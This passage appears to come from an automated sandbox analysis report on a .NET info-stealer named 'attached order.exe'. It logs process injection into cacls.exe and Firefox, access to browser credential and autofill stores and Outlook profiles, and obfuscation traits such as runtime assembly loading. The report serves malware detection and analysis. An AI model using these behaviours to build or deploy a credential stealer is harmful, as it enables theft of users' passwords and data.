                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F24570 NtSuspendThread,5_2_02F24570
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22AA0 NtQueryInformationFile,5_2_02F22AA0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22BE0 NtQueryVirtualMemory,5_2_02F22BE0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22B20 NtQueryInformationProcess,5_2_02F22B20
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F229D0 NtWaitForSingleObject,5_2_02F229D0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22ED0 NtResumeThread,5_2_02F22ED0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22EC0 NtQuerySection,5_2_02F22EC0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22EB0 NtProtectVirtualMemory,5_2_02F22EB0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22E80 NtCreateProcessEx,5_2_02F22E80
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22E00 NtQueueApcThread,5_2_02F22E00
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22FB0 NtSetValueKey,5_2_02F22FB0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22F30 NtOpenDirectoryObject,5_2_02F22F30
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22CD0 NtEnumerateKey,5_2_02F22CD0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22C50 NtUnmapViewOfSection,5_2_02F22C50
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22C20 NtSetInformationFile,5_2_02F22C20
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22C10 NtOpenProcess,5_2_02F22C10
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22DC0 NtAdjustPrivilegesToken,5_2_02F22DC0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22DA0 NtReadVirtualMemory,5_2_02F22DA0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F22D50 NtWriteVirtualMemory,5_2_02F22D50
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F238D0 NtGetContextThread,5_2_02F238D0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F23C90 NtOpenThread,5_2_02F23C90
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F23C30 NtOpenProcessToken,5_2_02F23C30
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_00689560 NtCreateFile,5_2_00689560
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_006896D0 NtReadFile,5_2_006896D0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_006897D0 NtDeleteFile,5_2_006897D0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_00689870 NtClose,5_2_00689870
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_006899D0 NtAllocateVirtualMemory,5_2_006899D0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032C37E9 NtSuspendThread,5_2_032C37E9
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032C4528 NtMapViewOfSection,5_2_032C4528
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032C34C9 NtSetContextThread,5_2_032C34C9
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032C3B0A NtResumeThread,5_2_032C3B0A
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032BF813 NtMapViewOfSection,5_2_032BF813
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032BF8BA NtUnmapViewOfSection,5_2_032BF8BA
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032C48F1 NtUnmapViewOfSection,5_2_032C48F1
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032C52C45_2_032C52C4
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032BE7435_2_032BE743
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032C54555_2_032C5455
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032BCAC35_2_032BCAC3
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_032BD8085_2_032BD808
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 02F6EF10 appears 102 times
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 02F5E692 appears 86 times
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 02F25050 appears 58 times
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 02F37BE4 appears 102 times
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 02EDB910 appears 278 times
                      Source: C:\Users\user\Desktop\attached order.exeCode function: String function: 01787BE4 appears 98 times
                      Source: C:\Users\user\Desktop\attached order.exeCode function: String function: 0172B910 appears 272 times
                      Source: C:\Users\user\Desktop\attached order.exeCode function: String function: 017AE692 appears 86 times
                      Source: C:\Users\user\Desktop\attached order.exeCode function: String function: 017BEF10 appears 102 times
                      Source: C:\Users\user\Desktop\attached order.exeCode function: String function: 01775050 appears 36 times
                      Source: attached order.exe, 00000000.00000002.16562310891.000000000A270000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs attached order.exe
                      Source: attached order.exe, 00000000.00000002.16561859855.0000000009E20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameuser.dll" vs attached order.exe
                      Source: attached order.exe, 00000000.00000000.16527388562.0000000000ED2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWDoa.exe, vs attached order.exe
                      Source: attached order.exe, 00000000.00000002.16558585775.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuser.dll" vs attached order.exe
                      Source: attached order.exe, 00000000.00000002.16556003856.00000000014AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs attached order.exe
                      Source: attached order.exe, 00000003.00000002.16880118360.00000000012A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCACLS.EXEj% vs attached order.exe
                      Source: attached order.exe, 00000003.00000002.16880118360.00000000012BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCACLS.EXEj% vs attached order.exe
                      Source: attached order.exe, 00000003.00000002.16880703659.000000000182D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs attached order.exe
                      Source: attached order.exeBinary or memory string: OriginalFilenameWDoa.exe, vs attached order.exe
                      Source: attached order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: attached order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.attached order.exe.4bf5828.4.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.attached order.exe.9e20000.5.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.attached order.exe.4c15848.1.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, Yr9UhjPRPHk49KsZse.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, wLi39cVAXRaCxIGOj0.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, wLi39cVAXRaCxIGOj0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, wLi39cVAXRaCxIGOj0.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, Yr9UhjPRPHk49KsZse.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, wLi39cVAXRaCxIGOj0.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, wLi39cVAXRaCxIGOj0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, wLi39cVAXRaCxIGOj0.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, wLi39cVAXRaCxIGOj0.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, wLi39cVAXRaCxIGOj0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, wLi39cVAXRaCxIGOj0.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, Yr9UhjPRPHk49KsZse.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@8/6
                      Source: C:\Users\user\Desktop\attached order.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\attached order.exe.log
                      Source: C:\Users\user\Desktop\attached order.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\cacls.exeFile created: C:\Users\user\AppData\Local\Temp\t577G2K6
                      Source: attached order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\attached order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: cacls.exe, 00000005.00000002.17796945970.0000000007B34000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17061545869.0000000007B2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE [dbo].[adUsers] SET [samAccountName] = @samAccountName, [_dn] = @_dn, [phoneCorp] = @phoneCorp, [phoneMobile] = @phoneMobile, [IpPhone] = @IpPhone, [key_card] = @key_card WHERE (([id] = @Original_id) AND ([samAccountName] = @Original_samAccountName) AND ([_dn] = @Original__dn) AND ((@IsNull_phoneCorp = 1 AND [phoneCorp] IS NULL) OR ([phoneCorp] = @Original_phoneCorp)) AND ((@IsNull_phoneMobile = 1 AND [phoneMobile] IS NULL) OR ([phoneMobile] = @Original_phoneMobile)) AND ((@IsNull_IpPhone = 1 AND [IpPhone] IS NULL) OR ([IpPhone] = @Original_IpPhone)) AND ((@IsNull_key_card = 1 AND [key_card] IS NULL) OR ([key_card] = @Original_key_card)));
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[adUsers] ([samAccountName], [_dn], [phoneCorp], [phoneMobile], [IpPhone], [key_card]) VALUES (@samAccountName, @_dn, @phoneCorp, @phoneMobile, @IpPhone, @key_card);
                      Source: cacls.exe, 00000005.00000003.17056037329.0000000000939000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17056303248.0000000000959000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000002.17793373650.0000000000959000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE [dbo].[Employee_photo] SET [Id] = @Id, [SerialNumber] = @SerialNumber, [ePhoto] = @ePhoto, [ePath] = @ePath, [id_empl] = @id_empl WHERE (([id_photo] = @Original_id_photo) AND ([Id] = @Original_Id) AND ((@IsNull_SerialNumber = 1 AND [SerialNumber] IS NULL) OR ([SerialNumber] = @Original_SerialNumber)) AND ((@IsNull_ePath = 1 AND [ePath] IS NULL) OR ([ePath] = @Original_ePath)) AND ([id_empl] = @Original_id_empl));
                      Source: cacls.exe, 00000005.00000002.17796945970.0000000007B9A000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17065504826.0000000007B8E000.00000004.00000020.00020000.00000000.sdmp, t577G2K6.5.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[Employee_photo] ([Id], [SerialNumber], [ePhoto], [ePath], [id_empl]) VALUES (@Id, @SerialNumber, @ePhoto, @ePath, @id_empl);
                      Source: attached order.exeReversingLabs: Detection: 34%
                      Source: unknownProcess created: C:\Users\user\Desktop\attached order.exe "C:\Users\user\Desktop\attached order.exe"
                      Source: C:\Users\user\Desktop\attached order.exeProcess created: C:\Users\user\Desktop\attached order.exe "C:\Users\user\Desktop\attached order.exe"
                      Source: C:\Users\user\Desktop\attached order.exeProcess created: C:\Users\user\Desktop\attached order.exe "C:\Users\user\Desktop\attached order.exe"
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                      Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: version.dll
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: edgegdi.dll
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: amsi.dll
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: userenv.dll
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: iconcodecservice.dll
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: mswsock.dll
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: dnsapi.dll
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: iphlpapi.dll
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: fwpuclnt.dll
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ieframe.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: netapi32.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wkscli.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: mlang.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: winsqlite3.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: vaultcli.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\attached order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: C:\Users\user\Desktop\attached order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\SysWOW64\cacls.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                      Source: attached order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: attached order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: cacls.pdbGCTL source: attached order.exe, 00000003.00000002.16880118360.00000000012A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cacls.pdb source: attached order.exe, 00000003.00000002.16880118360.00000000012A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: attached order.exe, 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.16883020772.0000000002CFD000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.16879645325.0000000002B4A000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: attached order.exe, attached order.exe, 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.16883020772.0000000002CFD000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.16879645325.0000000002B4A000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 0.2.attached order.exe.4bf5828.4.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.attached order.exe.9e20000.5.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.attached order.exe.4c15848.1.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, wLi39cVAXRaCxIGOj0.cs.Net Code: t0y0Tll4Bs System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, wLi39cVAXRaCxIGOj0.cs.Net Code: t0y0Tll4Bs System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, wLi39cVAXRaCxIGOj0.cs.Net Code: t0y0Tll4Bs System.Reflection.Assembly.Load(byte[])
                      Source: attached order.exeStatic PE information: section name: .text entropy: 7.504742855579335
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, Nl3Yl9bhX5woqS4SNM.csHigh entropy of concatenated method names: 'KFi1JohfIc', 'huE1NEDNN5', 'rTK1kmriGl', 'x0G1GKafes', 'A0d16tGRlT', 'DOH12ewJh1', 'wGY1dyE9iG', 'EG51HLOW74', 'MDW1PgnNZW', 'iwH1pE6EmR'
                      Source: 0.2.attached order.exe.a270000.6.raw.unpack, BKFV9olV89pdWF9owx.csHigh entropy of concatenated method names: 'mgglUhNX0t', 'HnOlr7IHnd', 'qiVEKLjm2w', 'cYtEMDsRp5', 'HB0lV0XU6T', 'w3VlN3kMQ0', 'o34lRvOYGo', 'HyGlkMh0Vq', 'V5alGXsbH4', 'xNOlCbdasP'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, l79wYB7WMJ2cyYK3S5.csHigh entropy of concatenated method names: 'pvgoXenhU6', 'EqRo3wvQOS', 'GEwoTeN2m0', 'jDXob6ffWQ', 'Y4roifhMh8', 'zliov7a7DQ', 'AuWoqxpGNA', 'pcuoamH1jE', 'WHioQLb4Vx', 'em7oL3S8oh'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, nq4p8DrrfiFhR2PyIVo.csHigh entropy of concatenated method names: 'lmmfrHJB4q', 'xA1fze807A', 'zP5hKJJ8Hq', 'hOOhMQBVrF', 'UaKhYVAXsG', 't4Rht4bNg9', 'R74h0Ulalw', 'hnyh8cBmq7', 'HgmhsfVRNx', 'DhEhIohEMY'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, kiIMTrfFNeVMhL8TTa.csHigh entropy of concatenated method names: 'FPtciGKgY4', 'uwjcqjj1y7', 'BaTA28LlKI', 'SpLAd96T7O', 'MBQAHk2Z1P', 'YatAPovX6C', 'bbtApxfJ6d', 'eKsAjrM3fq', 'FlmAWUOTau', 'CVHAJj3tUq'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, Yr9UhjPRPHk49KsZse.csHigh entropy of concatenated method names: 'WmNIkEJEn2', 'rIPIGNn2vC', 'gNdIC1OxfP', 'ISbImWnp4F', 'NTUIxlHtIy', 'UToIuqjmwI', 'IyGIneOPmS', 'CIIIUTcxLh', 'LLVIOv2qOb', 'aWyIrpQTNW'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, kLptsSr60HPKa7R7vbZ.csHigh entropy of concatenated method names: 'ToString', 'QSBhaY6R1N', 'QfFhQfRKDo', 'duPhLR7Q1O', 'MuWhBqrjib', 'xumh6Z4ZCF', 'cJuh2dQCcY', 'm8fhd62BeY', 'ptMkRoL6UDDMUYeAth5', 'LdDnDvLruvYPQAdqcLt'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, GnTBRbs4alXFnisyMh.csHigh entropy of concatenated method names: 'b98fAZsDLZ', 'Fb7fcrjjrB', 'hBNfwoJRlH', 'q0pfoqEqiV', 'CuifF7UwQB', 'W3Qf5DL71J', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, itYFVZIe9hkpVHMofY.csHigh entropy of concatenated method names: 'Seqw8KTyg9', 'wGJwIye311', 'ETswceKNwF', 'rdtwo0d3Mt', 'rPNw5unmDi', 'Xj6cxE2IPA', 'REYcuRiqgA', 'C6DcnFpO6e', 'H35cUZTehd', 'iZccOkPpke'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, eRABhcrNQh1PLErMOYj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'y8DyFu4HrR', 'YJGyflb2Vj', 'g58yhLRGwC', 'XCIyyEgJrc', 'nViySFbZ2e', 'dgCy9Z1mSt', 'hS4yeae9CO'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, cQmN4b32gbIKZ4x1dS.csHigh entropy of concatenated method names: 'DJHAbcyoR3', 'qRYAvhfbWe', 'wtIAaSorC8', 'AWUAQTwRIH', 'Fq7A1BNvno', 'r18ADf5rMo', 'NiXAl1qLuX', 'iQcAEwOW1T', 'Ho6AFo0NEW', 'bUXAfSBKsr'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, gfskp8Q84So3K9tiKr.csHigh entropy of concatenated method names: 'oqmoswUdaK', 'QQSoAAp7nb', 'UkFowfpaYN', 'DL2wrPbg8b', 'm4Bwzjr8rP', 'dPvoKf3vwN', 'iSjoMp8hbt', 'ji0oYRb74t', 'RslotkMfJk', 'NKMo0Iqhy3'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, s8HNx2AxO9TnfXUWQd.csHigh entropy of concatenated method names: 'Bc3wLwrUa4xrOqpUmEP', 'c3mOOMrhIJYLCoOtbx2', 'lLtpvir2H37k5SJmhXL', 'SGcwEkCHm9', 'QcHwFyAUpx', 'Tnrwf4dT1X', 'QllN7Tr0buwPgGdlIWP', 'BUhh12rIxlZnyXgHgu8'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, YmlVkdiyjWDJPWx8hw.csHigh entropy of concatenated method names: 'Kc5F1d6u2P', 'gfhFlXZYTw', 'bKmFFuT2Mi', 'mB7FhQJYSf', 'uVaFSEKtWm', 'mGrFegvV9T', 'Dispose', 'qkhEsNgaN7', 'ctBEIptCKQ', 'n2kEAYIIdj'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, eTLVDTKsInEqj6ZJVp.csHigh entropy of concatenated method names: 'QgDlgjp2yu', 'HJ2l4n9COW', 'ToString', 'ErplsveGcJ', 'hS1lIN7DEg', 'rhulAYiITn', 'nJClc4KFxZ', 'FdIlwnlkcf', 'oURlobXjfr', 'ajnl5AlO1T'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, n33M3uz3ORD1UdBYlt.csHigh entropy of concatenated method names: 'yhXfvgH9Ws', 'NiefaHeHlH', 'ggHfQ9EU1s', 'ewcfBqZ045', 'pOof60l7ES', 'xJQfdnZR1D', 'hXxfHaBvhZ', 'n02fe3hIU8', 'n3hfXZhrfp', 'intf3Wmljq'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, EgP0XVNcRfQGNejquO.csHigh entropy of concatenated method names: 'aMLMoyQ3Ek', 'LyMM5lVUe8', 'boaMgVua79', 'fotM47u3Ye', 'z3cM1f0Zcy', 'qT3MDucRFr', 'ARTbvkMc6KNFI5I7C4', 'K1D1tUKcpeii4Q7rx4', 'BscMMcKMgP', 'DIdMtlxfsY'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, WcniDe88ARxPuNbytN.csHigh entropy of concatenated method names: 'ToString', 'mH4DVBYc97', 'J67D6XaQra', 'aweD2W48ye', 'zFrDd23Bud', 'RFcDHlML0s', 'IYcDPbicSt', 'aoLDpoTdw7', 'FxXDjjQtsc', 'FoSDW1Qnr6'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, Rpq2Lh6LQL1dHucNxX.csHigh entropy of concatenated method names: 'm7TTiK7tM', 'VHibv4SUk', 'HE5vp148q', 'YVVqfcUKn', 'IYRQ4VAXm', 'LaQL1bfvw', 'p3u9o4ogGhsFFWSnpA', 'CBcLcrX1At8i9Ajp8V', 'FLDEJhytJ', 'pMDfhOsim'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, QdlGFmrkGBZ5RgQMJfR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yD1fVnCA6l', 'DP0fNkEoC5', 'w7DfRBGDaS', 'JDtfkYnGmU', 'UuhfGW7Tyi', 'Nq1fC7nsM7', 'JXifm2WJph'
